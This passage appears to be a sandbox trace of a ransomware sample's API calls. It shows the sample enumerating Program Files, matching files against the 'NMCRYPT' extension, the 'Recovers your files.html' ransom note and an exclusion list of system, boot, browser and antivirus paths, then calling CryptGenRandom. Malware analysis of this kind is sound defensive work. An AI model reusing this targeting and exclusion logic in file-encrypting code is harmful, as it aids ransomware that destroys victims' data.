lpFindFileData=0x2d7e89c) returned 0x8be838 [0143.388] wcscmp (_String1=".", _String2=".") returned 0 [0143.388] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.404] wcscmp (_String1="..", _String2=".") returned 1 [0143.404] wcscmp (_String1="..", _String2="..") returned 0 [0143.404] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.404] PathMatchSpecW (pszFile="api-ms-win-core-file-l1-2-0.dll", pszSpec="*NMCRYPT") returned 0 [0143.404] PathMatchSpecW (pszFile="api-ms-win-core-file-l1-2-0.dll", pszSpec="*Recovers your files.html") returned 0 [0143.404] PathMatchSpecW (pszFile="api-ms-win-core-file-l1-2-0.dll", pszSpec="*.exe") returned 0 [0143.404] PathMatchSpecW (pszFile="api-ms-win-core-file-l1-2-0.dll", pszSpec="*.dll") returned 1 [0143.404] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.404] PathMatchSpecW (pszFile="api-ms-win-core-file-l2-1-0.dll", pszSpec="*NMCRYPT") returned 0 [0143.404] PathMatchSpecW (pszFile="api-ms-win-core-file-l2-1-0.dll", pszSpec="*Recovers your files.html") returned 0 [0143.404] PathMatchSpecW (pszFile="api-ms-win-core-file-l2-1-0.dll", pszSpec="*.exe") returned 0 [0143.404] PathMatchSpecW (pszFile="api-ms-win-core-file-l2-1-0.dll", pszSpec="*.dll") returned 1 [0143.404] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.404] PathMatchSpecW (pszFile="api-ms-win-core-localization-l1-2-0.dll", pszSpec="*NMCRYPT") returned 0 [0143.404] PathMatchSpecW (pszFile="api-ms-win-core-localization-l1-2-0.dll", pszSpec="*Recovers your files.html") returned 0 [0143.404] PathMatchSpecW (pszFile="api-ms-win-core-localization-l1-2-0.dll", pszSpec="*.exe") returned 0 [0143.404] PathMatchSpecW (pszFile="api-ms-win-core-localization-l1-2-0.dll", pszSpec="*.dll") returned 1 [0143.404] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.404] PathMatchSpecW (pszFile="api-ms-win-core-processthreads-l1-1-1.dll", pszSpec="*NMCRYPT") returned 0 [0143.404] PathMatchSpecW (pszFile="api-ms-win-core-processthreads-l1-1-1.dll", pszSpec="*Recovers your files.html") returned 0 [0143.404] PathMatchSpecW (pszFile="api-ms-win-core-processthreads-l1-1-1.dll", pszSpec="*.exe") returned 0 [0143.404] PathMatchSpecW (pszFile="api-ms-win-core-processthreads-l1-1-1.dll", pszSpec="*.dll") returned 1 [0143.404] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.404] PathMatchSpecW (pszFile="api-ms-win-core-synch-l1-2-0.dll", pszSpec="*NMCRYPT") returned 0 [0143.404] PathMatchSpecW (pszFile="api-ms-win-core-synch-l1-2-0.dll", pszSpec="*Recovers your files.html") returned 0 [0143.404] PathMatchSpecW (pszFile="api-ms-win-core-synch-l1-2-0.dll", pszSpec="*.exe") returned 0 [0143.404] PathMatchSpecW (pszFile="api-ms-win-core-synch-l1-2-0.dll", pszSpec="*.dll") returned 1 [0143.404] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.404] PathMatchSpecW (pszFile="api-ms-win-core-timezone-l1-1-0.dll", pszSpec="*NMCRYPT") returned 0 [0143.404] PathMatchSpecW (pszFile="api-ms-win-core-timezone-l1-1-0.dll", pszSpec="*Recovers your files.html") returned 0 [0143.404] PathMatchSpecW (pszFile="api-ms-win-core-timezone-l1-1-0.dll", pszSpec="*.exe") returned 0 [0143.404] PathMatchSpecW (pszFile="api-ms-win-core-timezone-l1-1-0.dll", pszSpec="*.dll") returned 1 [0143.404] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.404] PathMatchSpecW (pszFile="api-ms-win-core-xstate-l2-1-0.dll", pszSpec="*NMCRYPT") returned 0 [0143.404] PathMatchSpecW (pszFile="api-ms-win-core-xstate-l2-1-0.dll", pszSpec="*Recovers your files.html") returned 0 [0143.404] PathMatchSpecW (pszFile="api-ms-win-core-xstate-l2-1-0.dll", pszSpec="*.exe") returned 0 [0143.404] PathMatchSpecW (pszFile="api-ms-win-core-xstate-l2-1-0.dll", pszSpec="*.dll") returned 1 [0143.404] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.404] PathMatchSpecW (pszFile="api-ms-win-crt-conio-l1-1-0.dll", pszSpec="*NMCRYPT") returned 0 [0143.404] PathMatchSpecW (pszFile="api-ms-win-crt-conio-l1-1-0.dll", pszSpec="*Recovers your files.html") returned 0 [0143.404] PathMatchSpecW (pszFile="api-ms-win-crt-conio-l1-1-0.dll", pszSpec="*.exe") returned 0 [0143.404] PathMatchSpecW (pszFile="api-ms-win-crt-conio-l1-1-0.dll", pszSpec="*.dll") returned 1 [0143.404] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.404] PathMatchSpecW (pszFile="api-ms-win-crt-convert-l1-1-0.dll", pszSpec="*NMCRYPT") returned 0 [0143.404] PathMatchSpecW (pszFile="api-ms-win-crt-convert-l1-1-0.dll", pszSpec="*Recovers your files.html") returned 0 [0143.404] PathMatchSpecW (pszFile="api-ms-win-crt-convert-l1-1-0.dll", pszSpec="*.exe") returned 0 [0143.404] PathMatchSpecW (pszFile="api-ms-win-crt-convert-l1-1-0.dll", pszSpec="*.dll") returned 1 [0143.404] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.404] PathMatchSpecW (pszFile="api-ms-win-crt-environment-l1-1-0.dll", pszSpec="*NMCRYPT") returned 0 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-environment-l1-1-0.dll", pszSpec="*Recovers your files.html") returned 0 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-environment-l1-1-0.dll", pszSpec="*.exe") returned 0 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-environment-l1-1-0.dll", pszSpec="*.dll") returned 1 [0143.405] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-filesystem-l1-1-0.dll", pszSpec="*NMCRYPT") returned 0 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-filesystem-l1-1-0.dll", pszSpec="*Recovers your files.html") returned 0 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-filesystem-l1-1-0.dll", pszSpec="*.exe") returned 0 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-filesystem-l1-1-0.dll", pszSpec="*.dll") returned 1 [0143.405] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-heap-l1-1-0.dll", pszSpec="*NMCRYPT") returned 0 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-heap-l1-1-0.dll", pszSpec="*Recovers your files.html") returned 0 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-heap-l1-1-0.dll", pszSpec="*.exe") returned 0 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-heap-l1-1-0.dll", pszSpec="*.dll") returned 1 [0143.405] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-locale-l1-1-0.dll", pszSpec="*NMCRYPT") returned 0 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-locale-l1-1-0.dll", pszSpec="*Recovers your files.html") returned 0 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-locale-l1-1-0.dll", pszSpec="*.exe") returned 0 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-locale-l1-1-0.dll", pszSpec="*.dll") returned 1 [0143.405] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-math-l1-1-0.dll", pszSpec="*NMCRYPT") returned 0 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-math-l1-1-0.dll", pszSpec="*Recovers your files.html") returned 0 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-math-l1-1-0.dll", pszSpec="*.exe") returned 0 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-math-l1-1-0.dll", pszSpec="*.dll") returned 1 [0143.405] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-multibyte-l1-1-0.dll", pszSpec="*NMCRYPT") returned 0 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-multibyte-l1-1-0.dll", pszSpec="*Recovers your files.html") returned 0 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-multibyte-l1-1-0.dll", pszSpec="*.exe") returned 0 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-multibyte-l1-1-0.dll", pszSpec="*.dll") returned 1 [0143.405] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-private-l1-1-0.dll", pszSpec="*NMCRYPT") returned 0 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-private-l1-1-0.dll", pszSpec="*Recovers your files.html") returned 0 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-private-l1-1-0.dll", pszSpec="*.exe") returned 0 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-private-l1-1-0.dll", pszSpec="*.dll") returned 1 [0143.405] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-process-l1-1-0.dll", pszSpec="*NMCRYPT") returned 0 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-process-l1-1-0.dll", pszSpec="*Recovers your files.html") returned 0 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-process-l1-1-0.dll", pszSpec="*.exe") returned 0 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-process-l1-1-0.dll", pszSpec="*.dll") returned 1 [0143.405] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-runtime-l1-1-0.dll", pszSpec="*NMCRYPT") returned 0 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-runtime-l1-1-0.dll", pszSpec="*Recovers your files.html") returned 0 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-runtime-l1-1-0.dll", pszSpec="*.exe") returned 0 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-runtime-l1-1-0.dll", pszSpec="*.dll") returned 1 [0143.405] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-stdio-l1-1-0.dll", pszSpec="*NMCRYPT") returned 0 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-stdio-l1-1-0.dll", pszSpec="*Recovers your files.html") returned 0 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-stdio-l1-1-0.dll", pszSpec="*.exe") returned 0 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-stdio-l1-1-0.dll", pszSpec="*.dll") returned 1 [0143.405] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-string-l1-1-0.dll", pszSpec="*NMCRYPT") returned 0 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-string-l1-1-0.dll", pszSpec="*Recovers your files.html") returned 0 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-string-l1-1-0.dll", pszSpec="*.exe") returned 0 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-string-l1-1-0.dll", pszSpec="*.dll") returned 1 [0143.405] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.405] PathMatchSpecW (pszFile="api-ms-win-crt-time-l1-1-0.dll", pszSpec="*NMCRYPT") returned 0 [0143.406] PathMatchSpecW (pszFile="api-ms-win-crt-time-l1-1-0.dll", pszSpec="*Recovers your files.html") returned 0 [0143.406] PathMatchSpecW (pszFile="api-ms-win-crt-time-l1-1-0.dll", pszSpec="*.exe") returned 0 [0143.406] PathMatchSpecW (pszFile="api-ms-win-crt-time-l1-1-0.dll", pszSpec="*.dll") returned 1 [0143.406] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.406] PathMatchSpecW (pszFile="api-ms-win-crt-utility-l1-1-0.dll", pszSpec="*NMCRYPT") returned 0 [0143.406] PathMatchSpecW (pszFile="api-ms-win-crt-utility-l1-1-0.dll", pszSpec="*Recovers your files.html") returned 0 [0143.406] PathMatchSpecW (pszFile="api-ms-win-crt-utility-l1-1-0.dll", pszSpec="*.exe") returned 0 [0143.406] PathMatchSpecW (pszFile="api-ms-win-crt-utility-l1-1-0.dll", pszSpec="*.dll") returned 1 [0143.406] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.406] PathMatchSpecW (pszFile="ApiClient.dll", pszSpec="*NMCRYPT") returned 0 [0143.406] PathMatchSpecW (pszFile="ApiClient.dll", pszSpec="*Recovers your files.html") returned 0 [0143.406] PathMatchSpecW (pszFile="ApiClient.dll", pszSpec="*.exe") returned 0 [0143.406] PathMatchSpecW (pszFile="ApiClient.dll", pszSpec="*.dll") returned 1 [0143.406] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.406] PathMatchSpecW (pszFile="AppVCatalog.dll", pszSpec="*NMCRYPT") returned 0 [0143.406] PathMatchSpecW (pszFile="AppVCatalog.dll", pszSpec="*Recovers your files.html") returned 0 [0143.406] PathMatchSpecW (pszFile="AppVCatalog.dll", pszSpec="*.exe") returned 0 [0143.406] PathMatchSpecW (pszFile="AppVCatalog.dll", pszSpec="*.dll") returned 1 [0143.406] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.406] PathMatchSpecW (pszFile="appvcleaner.exe", pszSpec="*NMCRYPT") returned 0 [0143.406] PathMatchSpecW (pszFile="appvcleaner.exe", pszSpec="*Recovers your files.html") returned 0 [0143.406] PathMatchSpecW (pszFile="appvcleaner.exe", pszSpec="*.exe") returned 1 [0143.406] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.406] PathMatchSpecW (pszFile="AppVFileSystemMetadata.dll", pszSpec="*NMCRYPT") returned 0 [0143.406] PathMatchSpecW (pszFile="AppVFileSystemMetadata.dll", pszSpec="*Recovers your files.html") returned 0 [0143.406] PathMatchSpecW (pszFile="AppVFileSystemMetadata.dll", pszSpec="*.exe") returned 0 [0143.406] PathMatchSpecW (pszFile="AppVFileSystemMetadata.dll", pszSpec="*.dll") returned 1 [0143.406] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.406] PathMatchSpecW (pszFile="AppVIntegration.dll", pszSpec="*NMCRYPT") returned 0 [0143.406] PathMatchSpecW (pszFile="AppVIntegration.dll", pszSpec="*Recovers your files.html") returned 0 [0143.406] PathMatchSpecW (pszFile="AppVIntegration.dll", pszSpec="*.exe") returned 0 [0143.406] PathMatchSpecW (pszFile="AppVIntegration.dll", pszSpec="*.dll") returned 1 [0143.406] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.406] PathMatchSpecW (pszFile="AppVIsvApi.dll", pszSpec="*NMCRYPT") returned 0 [0143.406] PathMatchSpecW (pszFile="AppVIsvApi.dll", pszSpec="*Recovers your files.html") returned 0 [0143.406] PathMatchSpecW (pszFile="AppVIsvApi.dll", pszSpec="*.exe") returned 0 [0143.406] PathMatchSpecW (pszFile="AppVIsvApi.dll", pszSpec="*.dll") returned 1 [0143.406] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.406] PathMatchSpecW (pszFile="AppVIsvStreamingManager.dll", pszSpec="*NMCRYPT") returned 0 [0143.406] PathMatchSpecW (pszFile="AppVIsvStreamingManager.dll", pszSpec="*Recovers your files.html") returned 0 [0143.406] PathMatchSpecW (pszFile="AppVIsvStreamingManager.dll", pszSpec="*.exe") returned 0 [0143.406] PathMatchSpecW (pszFile="AppVIsvStreamingManager.dll", pszSpec="*.dll") returned 1 [0143.406] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.406] PathMatchSpecW (pszFile="AppVIsvSubsystemController.dll", pszSpec="*NMCRYPT") returned 0 [0143.406] PathMatchSpecW (pszFile="AppVIsvSubsystemController.dll", pszSpec="*Recovers your files.html") returned 0 [0143.406] PathMatchSpecW (pszFile="AppVIsvSubsystemController.dll", pszSpec="*.exe") returned 0 [0143.407] PathMatchSpecW (pszFile="AppVIsvSubsystemController.dll", pszSpec="*.dll") returned 1 [0143.407] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.407] PathMatchSpecW (pszFile="AppvIsvSubsystems32.dll", pszSpec="*NMCRYPT") returned 0 [0143.407] PathMatchSpecW (pszFile="AppvIsvSubsystems32.dll", pszSpec="*Recovers your files.html") returned 0 [0143.407] PathMatchSpecW (pszFile="AppvIsvSubsystems32.dll", pszSpec="*.exe") returned 0 [0143.407] PathMatchSpecW (pszFile="AppvIsvSubsystems32.dll", pszSpec="*.dll") returned 1 [0143.407] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.407] PathMatchSpecW (pszFile="AppvIsvSubsystems64.dll", pszSpec="*NMCRYPT") returned 0 [0143.407] PathMatchSpecW (pszFile="AppvIsvSubsystems64.dll", pszSpec="*Recovers your files.html") returned 0 [0143.407] PathMatchSpecW (pszFile="AppvIsvSubsystems64.dll", pszSpec="*.exe") returned 0 [0143.407] PathMatchSpecW (pszFile="AppvIsvSubsystems64.dll", pszSpec="*.dll") returned 1 [0143.407] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.407] PathMatchSpecW (pszFile="AppVIsvVirtualization.dll", pszSpec="*NMCRYPT") returned 0 [0143.407] PathMatchSpecW (pszFile="AppVIsvVirtualization.dll", pszSpec="*Recovers your files.html") returned 0 [0143.407] PathMatchSpecW (pszFile="AppVIsvVirtualization.dll", pszSpec="*.exe") returned 0 [0143.407] PathMatchSpecW (pszFile="AppVIsvVirtualization.dll", pszSpec="*.dll") returned 1 [0143.407] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.407] PathMatchSpecW (pszFile="AppVManifest.dll", pszSpec="*NMCRYPT") returned 0 [0143.407] PathMatchSpecW (pszFile="AppVManifest.dll", pszSpec="*Recovers your files.html") returned 0 [0143.407] PathMatchSpecW (pszFile="AppVManifest.dll", pszSpec="*.exe") returned 0 [0143.407] PathMatchSpecW (pszFile="AppVManifest.dll", pszSpec="*.dll") returned 1 [0143.407] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.407] PathMatchSpecW (pszFile="AppVOrchestration.dll", pszSpec="*NMCRYPT") returned 0 [0143.407] PathMatchSpecW (pszFile="AppVOrchestration.dll", pszSpec="*Recovers your files.html") returned 0 [0143.407] PathMatchSpecW (pszFile="AppVOrchestration.dll", pszSpec="*.exe") returned 0 [0143.407] PathMatchSpecW (pszFile="AppVOrchestration.dll", pszSpec="*.dll") returned 1 [0143.407] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.407] PathMatchSpecW (pszFile="AppVPolicy.dll", pszSpec="*NMCRYPT") returned 0 [0143.407] PathMatchSpecW (pszFile="AppVPolicy.dll", pszSpec="*Recovers your files.html") returned 0 [0143.407] PathMatchSpecW (pszFile="AppVPolicy.dll", pszSpec="*.exe") returned 0 [0143.407] PathMatchSpecW (pszFile="AppVPolicy.dll", pszSpec="*.dll") returned 1 [0143.407] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.407] PathMatchSpecW (pszFile="AppVScripting.dll", pszSpec="*NMCRYPT") returned 0 [0143.407] PathMatchSpecW (pszFile="AppVScripting.dll", pszSpec="*Recovers your files.html") returned 0 [0143.407] PathMatchSpecW (pszFile="AppVScripting.dll", pszSpec="*.exe") returned 0 [0143.407] PathMatchSpecW (pszFile="AppVScripting.dll", pszSpec="*.dll") returned 1 [0143.407] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.407] PathMatchSpecW (pszFile="AppVShNotify.exe", pszSpec="*NMCRYPT") returned 0 [0143.407] PathMatchSpecW (pszFile="AppVShNotify.exe", pszSpec="*Recovers your files.html") returned 0 [0143.407] PathMatchSpecW (pszFile="AppVShNotify.exe", pszSpec="*.exe") returned 1 [0143.407] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.407] PathMatchSpecW (pszFile="C2R32.dll", pszSpec="*NMCRYPT") returned 0 [0143.407] PathMatchSpecW (pszFile="C2R32.dll", pszSpec="*Recovers your files.html") returned 0 [0143.407] PathMatchSpecW (pszFile="C2R32.dll", pszSpec="*.exe") returned 0 [0143.407] PathMatchSpecW (pszFile="C2R32.dll", pszSpec="*.dll") returned 1 [0143.407] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.407] PathMatchSpecW (pszFile="C2R64.dll", pszSpec="*NMCRYPT") returned 0 [0143.407] PathMatchSpecW (pszFile="C2R64.dll", pszSpec="*Recovers your files.html") returned 0 [0143.407] PathMatchSpecW (pszFile="C2R64.dll", pszSpec="*.exe") returned 0 [0143.407] PathMatchSpecW (pszFile="C2R64.dll", pszSpec="*.dll") returned 1 [0143.407] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.407] PathMatchSpecW (pszFile="C2RHeartbeatConfig.xml", pszSpec="*NMCRYPT") returned 0 [0143.407] PathMatchSpecW (pszFile="C2RHeartbeatConfig.xml", pszSpec="*Recovers your files.html") returned 0 [0143.407] PathMatchSpecW (pszFile="C2RHeartbeatConfig.xml", pszSpec="*.exe") returned 0 [0143.407] PathMatchSpecW (pszFile="C2RHeartbeatConfig.xml", pszSpec="*.dll") returned 0 [0143.408] PathMatchSpecW (pszFile="C2RHeartbeatConfig.xml", pszSpec="*.lnk") returned 0 [0143.408] PathMatchSpecW (pszFile="C2RHeartbeatConfig.xml", pszSpec="*.bat") returned 0 [0143.408] PathMatchSpecW (pszFile="C2RHeartbeatConfig.xml", pszSpec="*.ini") returned 0 [0143.408] PathMatchSpecW (pszFile="C2RHeartbeatConfig.xml", pszSpec="*.msi") returned 0 [0143.408] PathMatchSpecW (pszFile="C2RHeartbeatConfig.xml", pszSpec="*.scf") returned 0 [0143.408] PathMatchSpecW (pszFile="C2RHeartbeatConfig.xml", pszSpec="*pagefile.sys*") returned 0 [0143.408] PathMatchSpecW (pszFile="C2RHeartbeatConfig.xml", pszSpec="*NTUSER.DAT*") returned 0 [0143.408] PathMatchSpecW (pszFile="C2RHeartbeatConfig.xml", pszSpec="*AppData*") returned 0 [0143.408] PathMatchSpecW (pszFile="C2RHeartbeatConfig.xml", pszSpec="*\\winrar\\*") returned 0 [0143.408] PathMatchSpecW (pszFile="C2RHeartbeatConfig.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0143.408] PathMatchSpecW (pszFile="C2RHeartbeatConfig.xml", pszSpec="*\\java\\*") returned 0 [0143.408] PathMatchSpecW (pszFile="C2RHeartbeatConfig.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0143.408] PathMatchSpecW (pszFile="C2RHeartbeatConfig.xml", pszSpec="*\\windows\\*") returned 0 [0143.408] PathMatchSpecW (pszFile="C2RHeartbeatConfig.xml", pszSpec="*\\ESET\\*") returned 0 [0143.408] PathMatchSpecW (pszFile="C2RHeartbeatConfig.xml", pszSpec="*\\AVG\\*") returned 0 [0143.408] PathMatchSpecW (pszFile="C2RHeartbeatConfig.xml", pszSpec="*\\AVIRA\\*") returned 0 [0143.408] PathMatchSpecW (pszFile="C2RHeartbeatConfig.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0143.408] PathMatchSpecW (pszFile="C2RHeartbeatConfig.xml", pszSpec="*Atheros*") returned 0 [0143.408] PathMatchSpecW (pszFile="C2RHeartbeatConfig.xml", pszSpec="*Realtek*") returned 0 [0143.408] PathMatchSpecW (pszFile="C2RHeartbeatConfig.xml", pszSpec="*bootmgr*") returned 0 [0143.408] PathMatchSpecW (pszFile="C2RHeartbeatConfig.xml", pszSpec="*boot*") returned 0 [0143.408] PathMatchSpecW (pszFile="C2RHeartbeatConfig.xml", pszSpec="*boot*") returned 0 [0143.408] PathMatchSpecW (pszFile="C2RHeartbeatConfig.xml", pszSpec="*CONFIG.SYS*") returned 0 [0143.408] PathMatchSpecW (pszFile="C2RHeartbeatConfig.xml", pszSpec="*IO.SYS*") returned 0 [0143.408] PathMatchSpecW (pszFile="C2RHeartbeatConfig.xml", pszSpec="*MSDOS.SYS*") returned 0 [0143.408] PathMatchSpecW (pszFile="C2RHeartbeatConfig.xml", pszSpec="*NTDETECT.COM*") returned 0 [0143.408] PathMatchSpecW (pszFile="C2RHeartbeatConfig.xml", pszSpec="*ntldr*") returned 0 [0143.408] PathMatchSpecW (pszFile="C2RHeartbeatConfig.xml", pszSpec="*chrome*") returned 0 [0143.408] PathMatchSpecW (pszFile="C2RHeartbeatConfig.xml", pszSpec="*opera*") returned 0 [0143.408] PathMatchSpecW (pszFile="C2RHeartbeatConfig.xml", pszSpec="*firefox*") returned 0 [0143.408] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml", pszSpec="*") returned 1 [0143.408] strlen (_Str="NMoreira") returned 0x8 [0143.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 